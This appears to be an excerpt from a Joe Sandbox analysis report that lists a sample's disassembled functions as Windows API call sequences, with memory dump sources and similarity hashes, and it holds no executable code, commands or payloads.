• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001B5F5B
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 6b9c990dd58a483fbb98f20bb68e2fdeeb0ddae1e5483daffbf1f0168f0826d2
• Instruction ID: facdc015ed948ea52c72cc96c74cb32b11c5cf026d2ffc2ab78ee5a132b29605
• Opcode Fuzzy Hash: 6b9c990dd58a483fbb98f20bb68e2fdeeb0ddae1e5483daffbf1f0168f0826d2
• Instruction Fuzzy Hash: FE51CF715187019BD7159B28C845BFBF7AAAF59350F080A2DF895D31E0DB70CE54C792
APIs
• CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001B10B8
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001B10EE
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001B10FF
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B1181
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 885ea8ef18a9af59478593130bb79ae7d3ec78e5b80958c8576a5213ec78694a
• Instruction ID: a922e97a70ebbec3fb86b91a6e528579a8d80e00b7ddd7b8ce954f97b5806fd7
• Opcode Fuzzy Hash: 885ea8ef18a9af59478593130bb79ae7d3ec78e5b80958c8576a5213ec78694a
• Instruction Fuzzy Hash: 39412AB1600204FFDB15CF68CC94AEA7BAAEF45354F5680A9EE09DF205D7B1D944CBA0
APIs
• _memset.LIBCMT ref: 001B5A93
• GetMenuItemInfoW.USER32 ref: 001B5AAF
• DeleteMenu.USER32(00000004,00000007,00000000), ref: 001B5AF5
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002318F0,00000000), ref: 001B5B3E
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: 79f682d5a0bbc5ce1675b7303a53f4cfe6919a2e44a25bfac030e4f73dd284ed
• Instruction ID: d4820cb58b1957830e2029c42b05556b23f3deb339d1a6b14c365ac4862d5d12
• Opcode Fuzzy Hash: 79f682d5a0bbc5ce1675b7303a53f4cfe6919a2e44a25bfac030e4f73dd284ed
• Instruction Fuzzy Hash: 9541C571204701AFDB14DF24D984FAABBEAEF88314F04461DF9A59B2D1D770E840CB62
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 001D0478
  • Part of subcall function 00177F40: _memmove.LIBCMT ref: 00177F8F
  • Part of subcall function 0017A2FB: _memmove.LIBCMT ref: 0017A33D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2411302734-567219261
• Opcode ID: f91db6aa3dee00924d916b63c139ba260ea62c65f61648e42c3d512280494d31
• Instruction ID: ef247d3c50d295509fb60c38d598295de31249ef34087191c8806c0f0c4050d7
• Opcode Fuzzy Hash: f91db6aa3dee00924d916b63c139ba260ea62c65f61648e42c3d512280494d31
• Instruction Fuzzy Hash: 6E31B270500619ABCF05EF58D840AEEB3B5FF29310F50862AE866AB3D1DB71EA05CF40
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001AC684
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001AC697
• SendMessageW.USER32(?,00000189,?,00000000), ref: 001AC6C7
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$_memmove
• String ID: ComboBox$ListBox
• API String ID: 458670788-1403004172
• Opcode ID: 7df98ffff18b785fa9c5a00be42c98eb0c4c37bbb6c3cf9d820b5d6273f991f0
• Instruction ID: dccae584c1484f37979b514a28c524c4d5f03fd12667fca0326732801d6784be
• Opcode Fuzzy Hash: 7df98ffff18b785fa9c5a00be42c98eb0c4c37bbb6c3cf9d820b5d6273f991f0
• Instruction Fuzzy Hash: E821F3B5900108BEDB04EBA4DC86DFFB7B9DF26310B108119F42AE72E1DB744D4A9A90
                                                                                                                              APIs
                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001C4A60
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C4A86
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001C4AB6
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 001C4AFD
                                                                                                                                • Part of subcall function 001C56A9: GetLastError.KERNEL32(?,?,001C4A2B,00000000,00000000,00000001), ref: 001C56BE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1951874230-3916222277
                                                                                                                              • Opcode ID: dd58d903e745346d0d2eafe3f0c0b52202d654ab582746729d242629d8330105
                                                                                                                              • Instruction ID: 03ec38e1491fc2c389404cfc18669f4644e6c5167edbac2450f19e7c10a44365
                                                                                                                              • Opcode Fuzzy Hash: dd58d903e745346d0d2eafe3f0c0b52202d654ab582746729d242629d8330105
                                                                                                                              • Instruction Fuzzy Hash: AE21C9B6544208BFEB21EB649C95FBFB6ADEBA8B48F10011EF106A7140EB60DD459760
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001E454E
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • _memset.LIBCMT ref: 00173965
                                                                                                                              • _wcscpy.LIBCMT ref: 001739B5
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001739C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                              • String ID: Line:
                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                              • Opcode ID: b8cd6a39df4062d8d54aa2cb12fee43e965d8f8c0cadf333c222fd79334bd3c4
                                                                                                                              • Instruction ID: 89f57dcc558f5536b5abf7a9e10590476b5bd6b6e9aef02244653542e88f4081
                                                                                                                              • Opcode Fuzzy Hash: b8cd6a39df4062d8d54aa2cb12fee43e965d8f8c0cadf333c222fd79334bd3c4
                                                                                                                              • Instruction Fuzzy Hash: C931C471118340ABD725EB60DC45BEF77F8AF68314F00851EF69D821A1DB70AA98CB92
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                                • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                                • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001D8F69
                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 001D8F70
                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001D8F85
                                                                                                                              • DestroyWindow.USER32(?), ref: 001D8F8D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                              • String ID: SysAnimate32
                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                              • Opcode ID: f379390435041ee2307dbc386122b8de8e9f1d3cdfd54c94a52736b7b8ac7ed1
                                                                                                                              • Instruction ID: 638642fce4dfad997aaef2b5b78838f060efecc5bf8638aa27a525ae5374a2de
                                                                                                                              • Opcode Fuzzy Hash: f379390435041ee2307dbc386122b8de8e9f1d3cdfd54c94a52736b7b8ac7ed1
                                                                                                                              • Instruction Fuzzy Hash: F1219A71200205BFEF106F64EC84EBF37AAEB59324F10462AFA5497290CB71DC919B60
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001BE392
                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 001BE3E6
                                                                                                                              • __swprintf.LIBCMT ref: 001BE3FF
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0020DBF0), ref: 001BE43D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                              • String ID: %lu
                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                              • Opcode ID: 67fcc1bd7f5e36b51476790ea9a88a2e55342100b56c0b10bcf3802e4b959478
                                                                                                                              • Instruction ID: e4be5e9777690a909f65a3c1101ca4e07c2a63313e3df3caa3a8c6067268c57b
                                                                                                                              • Opcode Fuzzy Hash: 67fcc1bd7f5e36b51476790ea9a88a2e55342100b56c0b10bcf3802e4b959478
                                                                                                                              • Instruction Fuzzy Hash: D6218035A40208AFCB10EFA4DC85EEEBBB9EF99704F108069F509D7292D771DA41CB61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                                • Part of subcall function 001AD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001AD640
                                                                                                                                • Part of subcall function 001AD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AD653
                                                                                                                                • Part of subcall function 001AD623: GetCurrentThreadId.KERNEL32 ref: 001AD65A
                                                                                                                                • Part of subcall function 001AD623: AttachThreadInput.USER32(00000000), ref: 001AD661
                                                                                                                              • GetFocus.USER32 ref: 001AD7FB
                                                                                                                                • Part of subcall function 001AD66C: GetParent.USER32(?), ref: 001AD67A
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 001AD844
                                                                                                                              • EnumChildWindows.USER32(?,001AD8BA), ref: 001AD86C
                                                                                                                              • __swprintf.LIBCMT ref: 001AD886
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                              • String ID: %s%d
                                                                                                                              • API String ID: 1941087503-1110647743
                                                                                                                              • Opcode ID: ff72e8288bf514a93b7da21188c1a94549d6589c9fa42a47f923d8e3574b2c44
                                                                                                                              • Instruction ID: 083328fd4aeef18779f368c6068bf4107b17a2957ec6a55099a18752bf7813c7
                                                                                                                              • Opcode Fuzzy Hash: ff72e8288bf514a93b7da21188c1a94549d6589c9fa42a47f923d8e3574b2c44
                                                                                                                              • Instruction Fuzzy Hash: E811A2795002056BDB11BF90AC85FBE3779AB55704F0080B5F90EAA586DB7459458B70
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001D18E4
                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001D1917
                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001D1A3A
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001D1AB0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2364364464-0
                                                                                                                              • Opcode ID: c7dc4e455c55e3e89474d7024723feece320c6aca66860eba3caf109f91af734
                                                                                                                              • Instruction ID: cb045a82e3e58bd7cce0dc47929a6a59705950a2b513f52e72cad4743e2c99c2
                                                                                                                              • Opcode Fuzzy Hash: c7dc4e455c55e3e89474d7024723feece320c6aca66860eba3caf109f91af734
                                                                                                                              • Instruction Fuzzy Hash: A3815071A40215BFDB14EF64C886BADBBF9AF44720F158059F909AF382D7B4A9418F90
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001D05DF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 001D066E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 001D068C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 001D06D2
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 001D06EC
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327935632-0
                                                                                                                              • Opcode ID: 08241e38083c69309918a0ea339340b53fb66d6dbf905653f10c3e5f797fbc42
                                                                                                                              • Instruction ID: 6a1b37632633d80e99878964bbfd80fe5e5a4445f9f19a6b6e25701224000d27
                                                                                                                              • Opcode Fuzzy Hash: 08241e38083c69309918a0ea339340b53fb66d6dbf905653f10c3e5f797fbc42
                                                                                                                              • Instruction Fuzzy Hash: 0F516975A002059FCB01EFA8C495AEDB7B5FF58310F14C06AE95AAB352DB30ED45CB91
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2DE0
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D2E1F
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001D2E66
                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 001D2E92
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 001D2E9F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3440857362-0
                                                                                                                              • Opcode ID: 18f4c276f03613238bf3e79a479116c15c85cd90d24684ab6d6c475a49983eba
                                                                                                                              • Instruction ID: 8396a33496779bbe1213c00daacd9e2078b96befc50ab3c475664477f9b01cd4
                                                                                                                              • Opcode Fuzzy Hash: 18f4c276f03613238bf3e79a479116c15c85cd90d24684ab6d6c475a49983eba
                                                                                                                              • Instruction Fuzzy Hash: B1515C71204205AFC705EF64C881E6BB7F9FFA8304F14891EF595872A1EB71E945CB52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5806d79a773fe39f8f27935e5dac7883888fa4cdcffe72d803bbb84c3b9c4b9e
